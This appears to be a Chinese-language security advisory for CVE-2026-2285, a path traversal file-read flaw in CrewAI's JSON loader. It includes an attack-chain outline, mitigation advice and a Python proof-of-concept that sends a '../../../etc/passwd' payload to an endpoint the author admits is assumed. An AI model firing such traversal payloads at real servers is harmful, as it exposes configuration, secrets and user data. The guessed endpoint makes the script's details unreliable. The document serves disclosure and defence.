CVE-2026-2285 CrewAI 任意本地文件读取漏洞

漏洞信息

漏洞编号

CVE-2026-2285

漏洞类型

任意文件读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CrewAI

漏洞概述

CrewAI是一个用于协调AI代理的框架，CVE-2026-2285是该框架中发现的一个高危安全漏洞。该漏洞存在于其JSON加载器组件中，由于该组件在处理文件读取请求时未对文件路径进行有效的验证和过滤，导致了严重的路径遍历漏洞。未经身份验证的远程攻击者可利用此缺陷，通过精心构造的恶意路径参数，绕过目录限制，读取服务器上的任意本地文件。这包括但不限于敏感的配置文件、环境变量、源代码以及用户数据，从而对系统的机密性构成严重威胁。

技术细节

该漏洞的根本原因在于CrewAI的JSON加载器工具缺乏必要的安全防御机制。具体而言，当工具接收用户输入的文件路径参数时，直接将其传递给底层的文件读取函数，而未对路径进行规范化处理或合法性校验。由于CVSS向量显示攻击无需认证（PR:N）且通过网络发起（AV:N），这表明该接口可能直接暴露在API端点中。攻击者可以通过构造包含“../”序列或绝对路径的恶意字符串（例如“../../../../etc/passwd”），利用路径遍历技术突破预期的目录限制。系统在解析该路径时，会将序列符解析为上级目录，最终导致服务器返回非预期的敏感文件内容。这种设计缺陷严重违反了最小权限原则和输入验证的安全规范。

攻击链分析

STEP 1

侦查

攻击者识别目标系统正在使用CrewAI框架，并确定了暴露的JSON加载器工具接口。

STEP 2

武器化

攻击者构造包含路径遍历序列（如“../”）的恶意 payload，旨在访问系统敏感文件（如 /etc/passwd）。

STEP 3

交付

攻击者通过网络向CrewAI的JSON加载器接口发送包含恶意文件路径的请求。

STEP 4

利用

由于目标系统未对路径进行验证，应用程序读取了路径解析后的文件内容。

STEP 5

渗透

应用程序将读取到的敏感文件内容返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-2285 (CrewAI Arbitrary Local File Read)
# This script demonstrates how a lack of path validation can lead to file reading.

import requests

def exploit_crewai_lfi(target_url, malicious_path):
    """
    Exploit the JSON loader tool to read arbitrary files.
    :param target_url: The URL of the CrewAI instance endpoint
    :param malicious_path: The path to the file on the server (e.g., '../../../etc/passwd')
    """
    # Assuming the vulnerable endpoint accepts a 'file_path' parameter or JSON body
    payload = {
        "file_path": malicious_path,
        "action": "load_json"
    }

    try:
        # Sending the malicious request
        response = requests.post(target_url, json=payload)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8000/api/load-json" 
    # Path traversal payload to read /etc/passwd on Linux
    file_to_read = "../../../etc/passwd"
    
    print(f"[*] Attempting to read {file_to_read} from {target}...")
    exploit_crewai_lfi(target, file_to_read)

影响范围

CrewAI (具体受影响版本未在提供的信息中披露)

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用JSON加载器工具的功能。同时，应在网络边界（如WAF或API网关）部署规则，拦截包含路径遍历字符（如“../”或“%2e%2e/”）的请求，以阻断潜在的攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2285
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2285
3 Details https://www.cvedetails.com/cve/CVE-2026-2285/
4 VulDB https://vuldb.com/cve/CVE-2026-2285
5 Link https://www.kb.cert.org/vuls/id/221883